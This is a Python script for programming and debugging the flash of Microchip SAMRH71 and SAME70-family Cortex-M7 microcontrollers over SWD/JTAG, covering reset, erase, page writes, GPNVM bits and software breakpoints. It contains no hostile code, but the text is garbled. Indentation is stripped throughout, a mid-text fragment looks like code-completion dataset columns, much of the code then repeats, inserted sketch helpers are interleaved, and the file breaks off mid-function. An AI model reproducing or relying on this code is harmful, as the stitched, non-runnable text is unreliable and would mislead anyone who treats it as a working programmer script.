log.info("Prog: Blank check")
def erase():#mplab
log.info("Prog: Erase")
reset_and_halt()
dev.Write32(efc_fcr, efc_cmd_ea)
#log.info("Issued Erase All, wait for flash ready")
waitForFlashReady()
def reset_and_halt():
log.info("Prog: Reset and halt")
# check run state and clear S_RESET_ST so that we can use it to detect end of reset later
if is_target_running():
halt_or_raise()
dev.Write32(arm.DEMCR, 0x01000001) # TRCENA | VC_CORERESET)
if "RH71" in device:
# SAMRH71 uses SYSRESETREQ to reset core + peripherals; this loses the connection, so we need to reconnect.
try:
dev.Write32(arm.AIRCR, 0x05fa0004) # VECTKEY | SYSRESETREQ) # 1=VECTRESET 4=SYSRESETREQ
except:
log.info("Reset with SYSRESETREQ, lost connection, try to reconnect to the device")
dev.Disconnect()
dev.Connect(comm_iface, comm_speed)
else:
# Canopus uses RSTC (PROCRST) to reset peripherals and VECTRESET to reset the core.
resetPeripheralsWithRstc()
dev.Write32(arm.AIRCR, 0x05fa0001) # VECTKEY | VECTRESET) # 1=VECTRESET 4=SYSRESETREQ
n = 0
max_retries = 100
seenReset = False
while n < max_retries:
dhcsr = dev.Read32(arm.DHCSR)
log.info("S_RESET_ST = %s / %s at PC = %X" % ("1" if dhcsr & 0x02000000 else "0", "Halted" if dhcsr & 0x20000 else "RUNNING", get_pc()))
if (dhcsr & 0x02000000): # wait for S_RESET_ST
seenReset = True
hasHalted = 0 != (dhcsr & 0x20000) # S_HALT
if seenReset:
if hasHalted: # wait for S_HALT
break
dev.Delay(100000) # 100ms
n = n+1
dev.Write32(dev.DEMCR, 0x01000000) # TRCENA reset VC_CORERESET bit
if n == max_retries:
raise Exception("timeout in reset")
if "RH71" in device:
initialize_HEFC()
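# --- Illustrative sketch, not part of the original script ---
# The polling loop above watches two DHCSR status bits: S_RESET_ST (bit 25,
# mask 0x02000000, sticky "a reset occurred") and S_HALT (bit 17, mask 0x20000,
# core halted in debug state). Decoded standalone:
def decode_dhcsr(dhcsr):
    return {
        "reset_seen": bool(dhcsr & 0x02000000), # S_RESET_ST
        "halted": bool(dhcsr & 0x00020000), # S_HALT
    }
# e.g. decode_dhcsr(0x02030003) -> {'reset_seen': True, 'halted': True}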
def initialize_HEFC(): # only for SAMRH71
log.info("Prog: initialize_HEFC")
# set up GCLK for HEFC
dev.Write32(0x40100254, 0x00008000) # disable watchdog wdt_mr
dev.Write32(0x4000C020, 0x00370028) # Set internal RC 10 MHz ckgr_mor
dev.Write32(0x4000C10C, 0x30401432) # Set GCLK with div 5 pmc_pcr
if rh71_2_0_workaround_VAR_factor:
set_var_factor_and_power_toggle_flash()
#waitForPWSReady
n = 0
max_retries = 100
while n < max_retries:
r = dev.Read32(efc_fpmr)
if r & 2: # PWS_STAT
dev.Delay(250000) # wait 250ms after seeing PWS_STAT bit
break
dev.Delay(100000) # 100ms
n = n+1
if n == max_retries:
raise Exception("Timeout waiting for PWS ready")
if rh71_2_0_workaround_init_PC_SP:
initialize_PC_SP()
def set_var_factor_and_power_toggle_flash(): # only for SAMRH71, probably only needed for rev 2.0 boards
# Flash reset problem (rev 2.0 of the device): without this workaround the
# flash can only be read on every second reset.
dev.Write32(efc_fpmr, 0x00013F0F) # set var factor at 0x3F 1111
dev.Write32(efc_fpmr, 0x00013F0E) # Power OFF flash 1110
dev.Write32(efc_fpmr, 0x00003F0D) # Power ON flash 1101
def initialize_PC_SP(): # only for SAMRH71, probably only needed for rev 2.0 boards
log.info("Initialize PC and SP (should be done by core, problem in SAMRH71F20-EK board rev 2.0)")
reset_handler = dev.Read32(0x10000004)
old_pc = get_pc()
pc_different = old_pc != (reset_handler & 0xFFFFFFFE)
stack_pointer = dev.Read32(0x10000000)
old_sp = get_sp()
sp_different = old_sp != stack_pointer
if pc_different and reset_handler != 0xFFFFFFFF: # only if the flash is not erased
set_pc(reset_handler)
# Correct EPSR T bit in case core didn't initialize PC and T bit correctly (if PC bit 0 is set, then set T bit)
psr = dev.ReadReg64(16)
if reset_handler & 1 and not psr & 0x01000000:
log.error("PC initialization by core failed, corrected 0x%X -> 0x%X and set EPSR T bit" % (old_pc, get_pc()))
dev.WriteReg64(16, psr | 0x01000000)
else:
log.error("PC initialization by core failed, corrected 0x%X -> 0x%X" % (old_pc, get_pc()))
if sp_different and stack_pointer != 0xFFFFFFFF: # only if the flash is not erased
set_sp(stack_pointer)
log.error("SP initialization by core failed, corrected 0x%X -> 0x%X" % (old_sp, get_sp()))
def hold_in_reset():#mplab
log.info("Prog: Hold in reset")
dev.Connect(comm_iface, comm_speed)
reset_and_halt()
dev.Disconnect()
def release_from_reset():#mplab
log.info("Prog: Release from reset")
# toggle reset line
dev.Pins(0,dev.RESET,1000)
if "RH71" in device and rh71_2_0_workaround_reset_30ms_delay:
dev.Delay(30000) # add 30ms delay holding reset low, needed for SAMRH71 board rev 2.0
dev.Pins(dev.RESET,dev.RESET,1000) # now float reset back
# workaround if reset line is not connected on board
# dev.Write32(dev.AIRCR, 0x05fa0004) # VECTKEY | SYSRESETREQ
def write_flash_page(adr, ofs, data):
log.info("Write flash page adr=0x%0x, ofs=0x%0x" % (adr, ofs))
dev.Write(adr, data, ofs, PAGE_SIZE)
# Remove flash offset, if any, and mask away page internal address bits.
# Position page_number in the FARG bitfield in EFC_FCR
if "RH71" in device:
page_number = adr & 0x3fff00 # SAMRH71 has page_size 256
else:
page_number = (adr & 0x3ffe00)/2 # Canopus has page_size 512
dev.Write32(efc_fcr, efc_cmd_wp | page_number)
waitForFlashReady()
log.info("Written page %d (0x%0x) at 0x%0x" %
(page_number/256, page_number*2, adr))
def prog_write(type_of_mem, address, length, data):#mplab
log.info("Prog: Writing %d bytes to address 0x%0x of %s memory" % (length, address, type_of_mem))
if str(type_of_mem) == "Cfg":
# Convert the value to indexed access, writing one GPNVM bit at a time
mask = GPNVM_BIT_MASK # Use mask to avoid writing to reserved bits
bit_index = 0
for val in data:
for bit in bitsInByte(val):
if(mask & 0x01):
if(bit == 1):
log.info("Debug:: Setting GPNVM bit %d" % bit_index)
dev.Write32(efc_fcr,
efc_cmd_sgpb | (bit_index << 8))
waitForFlashReady()
else:
log.info("Debug:: Clearing GPNVM bit %d" % bit_index)
dev.Write32(efc_fcr,
efc_cmd_cgpb | (bit_index << 8))
waitForFlashReady()
mask = mask >> 1
if not mask:
return
bit_index += 1
return # This should never be reached...
elif str(type_of_mem) != "Pgm":
log.warning(
"Debug:: Currently not supporting writing to memory type %s" % type_of_mem)
return
if is_target_running():
log.error("Error: Target is running when it should be halted")
halt_or_raise()
if "RH71" not in device: # SAMRH71 doesn't support wait states (ref prelim data sheet)
# Set Flash Wait States to 7 cycles (6+1)
dev.Write32(efc_fmr, 0x00000600)
written = 0
while written < length:
write_flash_page(address, written, data)
written += PAGE_SIZE
address += PAGE_SIZE
def prog_read(type_of_mem, address, length, data):#mplab
log.info("Prog: Reading %d bytes from address 0x%0x of %s memory..." % (length, address, type_of_mem))
global need_reset_for_read_operations
if need_reset_for_read_operations:
reset_and_halt() # necessary for reading flash with specific projects, ref MPLABX-4516
need_reset_for_read_operations = False
global did_read_operation
did_read_operation = True
if str(type_of_mem) == "Cfg":
gpnvm_address = address & 0x1F
dev.Write32(efc_fcr, efc_cmd_ggpb)
read_index = 0
data_index = 0
read_data = 0
while read_index < (gpnvm_address + length):
if read_index % 4 == 0:
read_data = dev.Read32(efc_frr)
log.info("Debug:: GPNVM at address 0x%0X, value: 0x%0X" %
(address, read_data))
if read_index >= gpnvm_address:
data[data_index] = 0xFF & read_data
data_index += 1
read_data = read_data >> 8
read_index += 1
return
dev.Read(address, data, 0, length)
def verify_transfer(type_of_mem, address, data, length):#mplab
log.info("Prog: not implemented: Verifying %d bytes to address 0x%0x of %s memory" % (length, address, type_of_mem))
def end_of_operations():#mplab
log.info("Prog: End of operations")
if was_running and did_read_operation:
if flash_strategy == 0:
run_target()
if flash_strategy == 1:
log.info("Target was running and we did prog_read, release it now")
release_from_reset()
dev.Disconnect()
global g_is_running
g_is_running = True
def begin_debug_session():#mplab
log.info("Debug:: Begin debug session")
dev.Connect(comm_iface, comm_speed)
reset_and_halt()
def debug_read(mem_type, start, length, data):#mplab
log.info("Debug: Reading %d bytes at start address 0x%0x (%s)" % (length, start, mem_type))
dev.Read(start, data, 0, length)
def debug_write(mem_type, start, length, data):#mplab
log.info("Debug: Writing %d bytes at start address 0x%0x (%s)" % (length, start, mem_type))
dev.Write(start, data, 0, length)
def get_pc():#mplab
return dev.ReadReg64(arm.PC)
def get_sp():
return dev.ReadReg64(arm.SP)
def run_target():#mplab
log.info("Debug: Run target")
dev.Write32(arm.DHCSR, 0xa05f0001) # DBGKEY|C_DEBUGEN
def halt_target():#mplab
log.info("Debug: Halt target")
#print_DHCSR("Target to be halted ")
dev.Write32(arm.DHCSR, 0xa05f0003) # DBGKEY|C_HALT|C_DEBUGEN
def step_target():#mplab
log.info("Debug: Stepping at pc 0x%0x" % get_pc())
#get_pc()
dev.Write32(arm.DHCSR, 0xa05f000b) #DBGKEY | C_DEBUGEN | C_HALT | C_MASKINTS
dev.Write32(arm.DHCSR, 0xa05f000d) #DBGKEY | C_DEBUGEN | C_STEP | C_MASKINTS
dev.Write32(arm.DHCSR, 0xa05f0003) #DBGKEY | C_DEBUGEN | C_HALT
def set_pc(pc):#mplab
log.info("Debug: Set pc to 0x%0x" % pc)
dev.WriteReg64(arm.PC,pc)
def set_sp(sp):
log.info("Debug: Set sp to 0x%0x" % sp)
dev.WriteReg64(arm.SP, sp)
def set_sw_bp(address, instruction, flags):
"""
* Sets/clears a software breakpoint
* @param address -> the address of the software breakpoint
* @param instruction -> the instruction to be programmed (either the software breakpoint
* opcode or the original instruction the software breakpoint was replacing).
* @param flags -> One or more of the SWBPFlags listed below
* @return returns the original/old opcode at address
"""
log.info("Debug:: set/remove bp at address 0x%0x, instructions 0x%0x, flags = 0x%0x" % (
address, instruction, flags))
# Accept addressing both from FLASH_START and from 0x0
addr = address & (FLASH_START-1)
single_page_access = False
buffer_size = PAGE_SIZE * 16
# Canopus: single page read-modify-write is possible within the first 16kb of flash.
# SAMRH71: single page read-modify-write is possible in whole flash.
if addr < 16384 or "RH71" in device:
buffer_size = PAGE_SIZE
single_page_access = True
buffer_mask = long(buffer_size-1)
data_buffer = bytearray(buffer_size)
# Get the start address to the flash page(es) we need to erase
start_addr = addr & ~(buffer_mask)
absolute_start_addr = address & ~(buffer_mask)
# Get BP address within the buffer
bp_addr = addr & buffer_mask
prog_read("pgm", absolute_start_addr, buffer_size, data_buffer)
org_inst = 0
n = 0
# Replace instruction in data_buffer
while(n < 2):
org_inst += data_buffer[bp_addr+n] << (n*8)
data_buffer[bp_addr+n] = ((instruction >> (n*8)) & 0xff)
n = n+1
if single_page_access:
if "RH71" in device:
# Remove flash offset, if any, and mask away page internal address bits.
# FARG bitfield in EFC_FCR
page_number = addr & 0x3fff00 # SAMRH71 has page_size 256
# Erase and write page (two separate commands on SAMRH71)
dev.Write32(efc_fcr, efc_cmd_ep | page_number)
waitForFlashReady()
dev.Write(start_addr, data_buffer, 0, PAGE_SIZE)
dev.Write32(efc_fcr, efc_cmd_wp | page_number)
waitForFlashReady()
else:
dev.Write(start_addr, data_buffer, 0, PAGE_SIZE)
# Remove flash offset, if any, and mask away page internal address bits.
# Then shift right once to position page_number in the FARG bitfield in EFC_FCR
page_number = (addr & 0x3ffe00)/2 # Canopus has page_size 512
# Erase and write page (one single command on Canopus)
dev.Write32(efc_fcr, efc_cmd_ewp | page_number)
waitForFlashReady()
else:
# Erase 16 pages (16 pages == buffer_size). The "0x200" sets the number of pages to erase.
dev.Write32(efc_fcr, efc_cmd_epa | (start_addr >> 1) | 0x200)
waitForFlashReady()
prog_write("Pgm", absolute_start_addr, buffer_size, data_buffer)
return org_inst
def reset_target():#mplab
reset_and_halt()
def is_target_running():#mplab
global g_is_running
dhcsr = dev.Read32(arm.DHCSR)
state = 0 == (dhcsr & 0x20000) # S_HALT
if state != g_is_running:
log.info("Debug: Changed running state to %s" % state)
g_is_running = state
return g_is_running
def end_debug_session():#mplab
dev.Disconnect()
| was_running = True
halt_or_raise() | conditional_block |
dap_cortex-m7.py | efc_cmd_getd = 0x5a000000
efc_cmd_wp = 0x5a000001
efc_cmd_wpl = 0x5a000002
efc_cmd_ea = 0x5a000005
efc_cmd_epa = 0x5a000007
efc_cmd_slb = 0x5a000008
efc_cmd_clb = 0x5a000009
efc_cmd_glb = 0x5a00000A
efc_cmd_sgpb = 0x5a00000B
efc_cmd_cgpb = 0x5a00000C
efc_cmd_ggpb = 0x5a00000D
if "RH71" in device:
FLASH_START = 0x10000000
PAGE_SIZE = 256
GPNVM_BIT_MASK = 0x2 # Bit mask for user changeable GPNVM bits
efc_fmr = 0x40004000 # HEFC Flash Mode Register
efc_fcr = 0x40004004 # HEFC Flash Command Register
efc_fsr = 0x40004008 # HEFC Flash Status Register
efc_frr = 0x4000400c # HEFC Flash Result Register
efc_fpmr = 0x40004040 # HEFC Flash Power Management Register
efc_wpmr = 0x400040e4 # HEFC Write Protection Mode Register
efc_cmd_ep = 0x5a000006 # available on SAMRH71, but not available on Canopus (SAME70, S70, V70/71)
rstc_cr = 0x40100200
rstc_sr = 0x40100204
rstc_mr = 0x40100208
else:
FLASH_START = 0x0400000
PAGE_SIZE = 512
GPNVM_BIT_MASK = 0x183 # Bit mask for user changeable GPNVM bits
efc_fmr = 0x400e0c00 # EEFC Flash Mode Register
efc_fcr = 0x400e0c04 # EEFC Flash Command Register
efc_fsr = 0x400e0c08 # EEFC Flash Status Register
efc_frr = 0x400e0c0c # EEFC Flash Result Register
efc_wpmr = 0x400e0ce4 # EEFC Write Protection Mode Register
efc_cmd_ewp = 0x5a000003 # available on Canopus (SAME70, S70, V70/71), but not available on SAMRH71
efc_cmd_ewpl = 0x5a000004 # available on Canopus (SAME70, S70, V70/71), but not available on SAMRH71
rstc_cr = 0x400e1800
rstc_sr = 0x400e1804
rstc_mr = 0x400e1808
# Flash strategy
# 0: Halt before programming/read mem operations, run afterwards
# 1: Reset and halt before programming/read mem operations, release from reset afterwards
if "RH71" in device:
flash_strategy = 0
else:
flash_strategy = 1
was_running = False
did_read_operation = False
need_reset_for_read_operations = False
# Workarounds for flash bank startup after reset problems with SAMRH71F20-EK board rev 2.0
rh71_2_0_workaround_VAR_factor = True
rh71_2_0_workaround_init_PC_SP = True
rh71_2_0_workaround_reset_30ms_delay = True
def begin_communication_session():
dev.SetApiLogging(1)
log.setShowOutput(False)
global comm_iface, comm_speed
try:
comm_iface = True if settings["communication.interface"].lower()=="swd" else False
comm_speed = 8000000 if settings["communication.autoselectspeed"] else settings["communication.frequency"]
except:
comm_iface = True
comm_speed = 8000000
def begin_programming_operation():
log.info("begin_programming_operation, interface: %s, freq: %d" % ("SWD" if comm_iface else "JTAG", comm_speed))
dev.Connect(comm_iface, comm_speed)
global was_running
was_running = False
global did_read_operation
did_read_operation = False
if is_target_running():
was_running = True
halt_or_raise()
global need_reset_for_read_operations
need_reset_for_read_operations = True if flash_strategy == 1 else False
def bitsInByte(byteValue):
for i in xrange(8):
yield (byteValue >> i) & 1
def log_efc_fsr_error(fsr):
err_string = ""
if fsr & 0x00080000: # FSR_MECCEMSB
err_string = "MECCEMSB"
if fsr & 0x00040000: # FSR_UECCEMSB
err_string += " UECCEMSB"
if fsr & 0x00020000: # FSR_MECCELSB
err_string += " MECCELSB"
if fsr & 0x00010000: # FSR_UECCELSB
err_string += " UECCELSB"
if fsr & 0x10: # FSR_WREER
err_string += " WREER"
if fsr & 8: # FSR_FLERR
err_string += " FLERR"
if fsr & 4: # FSR_FLOCKE
err_string += " FLOCKE"
if fsr & 2: # FSR_FCMDE
err_string += " FCMDE"
if err_string == "":
return
err_string = err_string + (" from the flash controller after command 0x%0x" % (dev.Read32(efc_fcr)))
log.error(err_string)
def waitForFlashReady():
n = 0
max_retries = 100
while n < max_retries:
r = dev.Read32(efc_fsr)
log_efc_fsr_error(r)
if r & 1: # FSR_FRDY:
break
dev.Delay(100000) # 100ms
n = n+1
if n == max_retries:
raise Exception("Timeout waiting for flash ready")
def halt_or_raise():
halt_target()
n = 0
while n < 100:
if not is_target_running():
return
dev.Delay(100000) # 100ms
n = n+1
raise Exception("Failed to halt target!")
def resetPeripheralsWithRstc():
dev.Write32(rstc_mr, 0xa5000b00) # long(RSTC_KEY) | rstc_erstl)
dev.Write32(rstc_cr, 0xa5000001) # long(RSTC_KEY) | PROCRST)
n = 0
max_retries = 100
while n < max_retries:
dev.Delay(10000) # 10ms
r = dev.Read32(rstc_sr)
if r & 0x00020000: # SRCMP
continue # Software reset in progress
if r & 0x00010000: # NRSTL
break
n = n+1
if n == max_retries:
raise Exception("timeout in reset")
dev.Write32(rstc_mr, 0xa5000001) # long(RSTC_KEY) | URSTEN) # Enable user reset again (URSTEN == 1)
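# --- Illustrative sketch, not part of the original script ---
# The wait loop above keys off two RSTC_SR bits: SRCMP (0x00020000, software
# reset command in progress) and NRSTL (0x00010000, NRST pin level high again).
def decode_rstc_sr(sr):
    return {
        "srcmp": bool(sr & 0x00020000), # reset still in progress
        "nrstl": bool(sr & 0x00010000), # NRST line released
    }
# e.g. decode_rstc_sr(0x00010000) -> {'srcmp': False, 'nrstl': True}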
def blank_check(): #mplab
log.info("Prog: Blank check")
def erase():#mplab
log.info("Prog: Erase")
reset_and_halt()
dev.Write32(efc_fcr, efc_cmd_ea)
#log.info("Issued Erase All, wait for flash ready")
waitForFlashReady()
def reset_and_halt():
log.info("Prog: Reset and halt")
# check run state and clear S_RESET_ST so that we can use it to detect end of reset later
if is_target_running():
halt_or_raise()
dev.Write32(arm.DEMCR, 0x01000001) # TRCENA | VC_CORERESET)
if "RH71" in device:
# SAMRH71 uses SYSRESETREQ to reset core + peripherals; this loses the connection, so we need to reconnect.
try:
dev.Write32(arm.AIRCR, 0x05fa0004) # VECTKEY | SYSRESETREQ) # 1=VECTRESET 4=SYSRESETREQ
except:
log.info("Reset with SYSRESETREQ, lost connection, try to reconnect to the device")
dev.Disconnect()
dev.Connect(comm_iface, comm_speed)
else:
# Canopus uses RSTC (PROCRST) to reset peripherals and VECTRESET to reset the core.
resetPeripheralsWithRstc()
dev.Write32(arm.AIRCR, 0x05fa0001) # VECTKEY | VECTRESET) # 1=VECTRESET 4=SYSRESETREQ
n = 0
max_retries = 100
seenReset = False
while n < max_retries:
dhcsr = dev.Read32(arm.DHCSR)
log.info("S_RESET_ST = %s / %s at PC = %X" % ("1" if dhcsr & 0x02000000 else "0", "Halted" if dhcsr & 0x20000 else "RUNNING", get_pc()))
if (dhcsr & 0x02000000): # wait for S_RESET_ST
seenReset = True
hasHalted = 0 != (dhcsr & 0x20000) # S_HALT
if seenReset:
if hasHalted: # wait for S_HALT
break
dev.Delay(100000) # 100ms
n = n+1
dev.Write32(dev.DEMCR, 0x01000000) # TRCENA reset VC_CORERESET bit
if n == max_retries:
raise Exception("timeout in reset")
if "RH71" in device:
initialize_HEFC()
def initialize_HEFC(): # only for SAMRH71
log.info("Prog: initialize_HEFC")
# set up GCLK for HEFC
dev.Write32(0x40100254, 0x00008000) # disable watchdog wdt_mr
dev.Write32(0x4000C020, 0x00370028) # Set internal RC 10 MHz ckgr_mor
dev.Write32(0x4000C10C, 0x30401432) # Set GCLK with div 5 pmc_pcr
if rh71_2_0_workaround_VAR_factor:
set_var_factor_and_power_toggle_flash()
#waitForPWSReady
n = 0
max_retries = 100
while n < max_retries:
r = dev.Read32(efc_fpmr)
if r & 2: # PWS_STAT
dev.Delay(250000) # wait 250ms after seeing PWS_STAT bit
break
dev.Delay(100000) # 100ms
n = n+1
if n == max_retries:
raise Exception("Timeout waiting for PWS ready")
if rh71_2_0_workaround_init_PC_SP:
initialize_PC_SP()
def set_var_factor_and_power_toggle_flash(): # only for SAMRH71, probably only needed for rev 2.0 boards
# Flash reset problem (rev 2.0 of the device): without this workaround the
# flash can only be read on every second reset.
dev.Write32(efc_fpmr, 0x00013F0F) # set var factor at 0x3F 1111
dev.Write32(efc_fpmr, 0x00013F0E) # Power OFF flash 1110
dev.Write32(efc_fpmr, 0x00003F0D) # Power ON flash 1101
def initialize_PC_SP(): # only for SAMRH71, probably only needed for rev 2.0 boards
log.info("Initialize PC and SP (should be done by core, problem in SAMRH71F20-EK board rev 2.0)")
reset_handler = dev.Read32(0x10000004)
old_pc = get_pc()
pc_different = old_pc != (reset_handler & 0xFFFFFFFE)
stack_pointer = dev.Read32(0x10000000)
old_sp = get_sp()
sp_different = old_sp != stack_pointer
if pc_different and reset_handler != 0xFFFFFFFF: # only if the flash is not erased
set_pc(reset_handler)
# Correct EPSR T bit in case core didn't initialize PC and T bit correctly (if PC bit 0 is set, then set T bit)
psr = dev.ReadReg64(16)
if reset_handler & 1 and not psr & 0x01000000:
log.error("PC initialization by core failed, corrected 0x%X -> 0x%X and set EPSR T bit" % (old_pc, get_pc()))
dev.WriteReg64(16, psr | 0x01000000)
else:
log.error("PC initialization by core failed, corrected 0x%X -> 0x%X" % (old_pc, get_pc()))
if sp_different and stack_pointer != 0xFFFFFFFF: # only if the flash is not erased
set_sp(stack_pointer)
log.error("SP initialization by core failed, corrected 0x%X -> 0x%X" % (old_sp, get_sp()))
def hold_in_reset():#mplab
log.info("Prog: Hold in reset")
dev.Connect(comm_iface, comm_speed)
reset_and_halt()
dev.Disconnect()
def release_from_reset():#mplab
log.info("Prog: Release from reset")
# toggle reset line
dev.Pins(0,dev.RESET,1000)
if "RH71" in device and rh71_2_0_workaround_reset_30ms_delay:
dev.Delay(30000) # add 30ms delay holding reset low, needed for SAMRH71 board rev 2.0
dev.Pins(dev.RESET,dev.RESET,1000) # now float reset back
# workaround if reset line is not connected on board
# dev.Write32(dev.AIRCR, 0x05fa0004) # VECTKEY | SYSRESETREQ
def write_flash_page(adr, ofs, data):
log.info("Write flash page adr=0x%0x, ofs=0x%0x" % (adr, ofs))
dev.Write(adr, data, ofs, PAGE_SIZE)
# Remove flash offset, if any, and mask away page internal address bits.
# Position page_number in the FARG bitfield in EFC_FCR
if "RH71" in device:
page_number = adr & 0x3fff00 # SAMRH71 has page_size 256
else:
page_number = (adr & 0x3ffe00)/2 # Canopus has page_size 512
dev.Write32(efc_fcr, efc_cmd_wp | page_number)
waitForFlashReady()
log.info("Written page %d (0x%0x) at 0x%0x" %
(page_number/256, page_number*2, adr))
def prog_write(type_of_mem, address, length, data):#mplab
log.info("Prog: Writing %d bytes to address 0x%0x of %s memory" % (length, address, type_of_mem))
if str(type_of_mem) == "Cfg":
# Convert the value to indexed access, writing one GPNVM bit at a time
mask = GPNVM_BIT_MASK # Use mask to avoid writing to reserved bits
bit_index = 0
for val in data:
for bit in bitsInByte(val):
if(mask & 0x01):
if(bit == 1):
log.info("Debug:: Setting GPNVM bit %d" % bit_index)
dev.Write32(efc_fcr,
efc_cmd_sgpb | (bit_index << 8))
waitForFlashReady()
else:
log.info("Debug:: Clearing GPNVM bit %d" % bit_index)
dev.Write32(efc_fcr,
efc_cmd_cgpb | (bit_index << 8))
waitForFlashReady()
mask = mask >> 1
if not mask:
return
bit_index += 1
return # This should never be reached...
elif str(type_of_mem) != "Pgm":
log.warning(
"Debug:: Currently not supporting writing to memory type %s" % type_of_mem)
return
if is_target_running():
log.error("Error: Target is running when it should be halted")
halt_or_raise()
if "RH71" not in device: # SAMRH71 doesn't support wait states (ref prelim data sheet)
# Set Flash Wait States to 7 cycles (6+1)
dev.Write32(efc_fmr, 0x00000600)
written = 0
while written < length:
write_flash_page(address, written, data)
written += PAGE_SIZE
address += PAGE_SIZE
def prog_read(type_of_mem, address, length, data):#mplab
log.info("Prog: Reading %d bytes from address 0x%0x of %s memory..." % (length, address, type_of_mem))
global need_reset_for_read_operations
if need_reset_for_read_operations:
reset_and_halt() # necessary for reading flash with specific projects, ref MPLABX-4516
need_reset_for_read_operations = False
global did_read_operation
did_read_operation = True
if str(type_of_mem) == "Cfg":
gpnvm_address = address & 0x1F
dev.Write32(efc_fcr, efc_cmd_ggpb)
read_index = 0
data_index = 0
read_data = 0
while read_index < (gpnvm_address + length):
if read_index % 4 == 0:
read_data = dev.Read32(efc_frr)
log.info("Debug:: GPNVM at address 0x%0X, value: 0x%0X" %
(address, read_data))
if read_index >= gpnvm_address:
data[data_index] = 0xFF & read_data
data_index += 1
read_data = read_data >> 8
read_index += 1
return
dev.Read(address, data, 0, length)
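# --- Illustrative sketch, not part of the original script ---
# The "Cfg" branch above shifts each 32-bit EFC_FRR word out one byte at a time,
# skipping bytes below the requested GPNVM offset. The same unpacking over a
# plain list of words (hypothetical values, no hardware access):
def unpack_gpnvm(words, gpnvm_address, length):
    out = []
    read_index = 0
    read_data = 0
    while read_index < (gpnvm_address + length):
        if read_index % 4 == 0:
            read_data = words[read_index // 4]
        if read_index >= gpnvm_address:
            out.append(read_data & 0xFF)
        read_data = read_data >> 8
        read_index += 1
    return out
# unpack_gpnvm([0x00000183], 0, 2) -> [0x83, 0x01]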
def verify_transfer(type_of_mem, address, data, length):#mplab
log.info("Prog: not implemented: Verifying %d bytes to address 0x%0x of %s memory" % (length, address, type_of_mem))
def end_of_operations():#mplab
log.info("Prog: End of operations")
if was_running and did_read_operation:
if flash_strategy == 0:
run_target()
if flash_strategy == 1:
log.info("Target was running and we did prog_read, release it now")
release_from_reset()
dev.Disconnect()
global g_is_running
g_is_running = True
def begin_debug_session():#mplab
log.info("Debug:: Begin debug session")
dev.Connect(comm_iface, comm_speed)
reset_and_halt()
def debug_read(mem_type, start, length, data):#mplab
log.info("Debug: Reading %d bytes at start address 0x%0x (%s)" % (length, start, mem_type))
dev.Read(start, data, 0, length)
def debug_write(mem_type, start, length, data):#mplab
log.info("Debug: Writing %d bytes at start address 0x%0x (%s)" % (length, start, mem_type))
dev.Write(start, data, 0, length)
def get_pc():#mplab
return dev.ReadReg64(arm.PC)
def get_sp():
return dev.ReadReg64(arm.SP)
def run_target():#mplab
log.info("Debug: Run target")
dev.Write32(arm.DHCSR, 0xa05f0001) # DBGKEY|C_DEBUGEN
def halt_target():#mplab
log.info("Debug: Halt target")
#print_DHCSR("Target to be halted ")
dev.Write32(arm.DHCSR, 0xa05f0003) # DBGKEY|C_HALT|C_DEBUGEN
def step_target():#mplab
log.info("Debug: Stepping at pc 0x%0x" % get_pc())
#get_pc()
dev.Write32(arm.DHCSR, 0xa05f000b) #DBGKEY | C_DEBUGEN | C_HALT | C_MASKINTS
dev.Write32(arm.DHCSR, 0xa05f000d) #DBGKEY | C_DEBUGEN | C_STEP | C_MASKINTS
dev.Write32(arm.DHCSR, 0xa05f0003) #DBGKEY | C_DEBUGEN | C_HALT
def set_pc(pc):#mplab
log.info("Debug: Set pc to 0x%0x" % pc)
dev.WriteReg64(arm.PC,pc)
def set_sp(sp):
log.info("Debug: Set sp to 0x%0x" % sp)
dev.WriteReg64(arm.SP, sp)
def set_sw_bp(address, instruction, flags):
"""
* Sets/clears a software breakpoint
* @param address -> the address of the software breakpoint
* @param instruction -> the instruction to be programmed (either the software breakpoint
* opcode or the original instruction the software breakpoint was replacing).
* @param flags -> One or more of the SWBPFlags listed below
* @return returns the original/old opcode at address
"""
log.info("Debug:: set/remove bp at address 0x%0x, instructions 0x%0x, flags = 0x%0x" % (
address, instruction, flags))
# Accept addressing both from FLASH_START and from 0x0
addr = address & (FLASH_START-1)
single_page_access = False
buffer_size = PAGE_SIZE * 16
# Canopus: single page read-modify-write is possible within the first 16kb of flash.
# SAMRH71: single page read-modify-write is possible in whole flash.
if addr < 16384 or "RH71" in device:
buffer_size = PAGE_SIZE
single_page_access = True
buffer_mask = long(buffer_size-1)
data_buffer = bytearray(buffer_size)
# Get the start address of the flash page(s) we need to erase
start_addr = addr & ~(buffer_mask)
absolute_start_addr = address & ~(buffer_mask)
# Get BP address within the buffer
bp_addr = addr & buffer_mask
prog_read("pgm", absolute_start_addr, buffer_size, data_buffer)
org_inst = 0
n = 0
# Replace instruction in data_buffer
while n < 2:
org_inst += data_buffer[bp_addr+n] << (n*8)
data_buffer[bp_addr+n] = ((instruction >> (n*8)) & 0xff)
n = n+1
if single_page_access:
if "RH71" in device:
# Remove flash offset, if any, and mask away page internal address bits.
# FARG bitfield in EFC_FCR
page_number = addr & 0x3fff00 # SAMRH71 has page_size 256
# Erase and write page (two separate commands on SAMRH71)
dev.Write32(efc_fcr, efc_cmd_ep | page_number)
waitForFlashReady()
dev.Write(start_addr, data_buffer, 0, PAGE_SIZE)
dev.Write32(efc_fcr, efc_cmd_wp | page_number)
waitForFlashReady()
else:
dev.Write(start_addr, data_buffer, 0, PAGE_SIZE)
# Remove flash offset, if any, and mask away page internal address bits.
# Then shift right once to position page_number in the FARG bitfield in EFC_FCR
page_number = (addr & 0x3ffe00)/2 # Canopus has page_size 512
# Erase and write page (one single command on Canopus)
dev.Write32(efc_fcr, efc_cmd_ewp | page_number)
waitForFlashReady()
else:
# Erase 16 pages (16 pages == buffer_size). The "0x200" sets the number of pages to erase.
dev.Write32(efc_fcr, efc_cmd_epa | (start_addr >> 1) | 0x200)
waitForFlashReady()
prog_write("Pgm", absolute_start_addr, buffer_size, data_buffer)
return org_inst
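# Illustrative sketch (not part of the original script): how the FARG page number
# written to EFC_FCR is derived for the two supported parts. It mirrors the masks
# used in set_sw_bp() above; FLASH_START comes from the surrounding script.
def _example_farg_for_breakpoint(address, is_rh71):
    # Accept addressing both from FLASH_START and from 0x0, as set_sw_bp() does
    addr = address & (FLASH_START - 1)
    if is_rh71:
        # SAMRH71: 256-byte pages, page bits stay in place (EP/WP commands)
        return addr & 0x3fff00
    # Canopus: 512-byte pages, page number shifted into the FARG bitfield (EWP command)
    return (addr & 0x3ffe00) / 2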
def reset_target():#mplab
reset_and_halt()
def is_target_running():#mplab
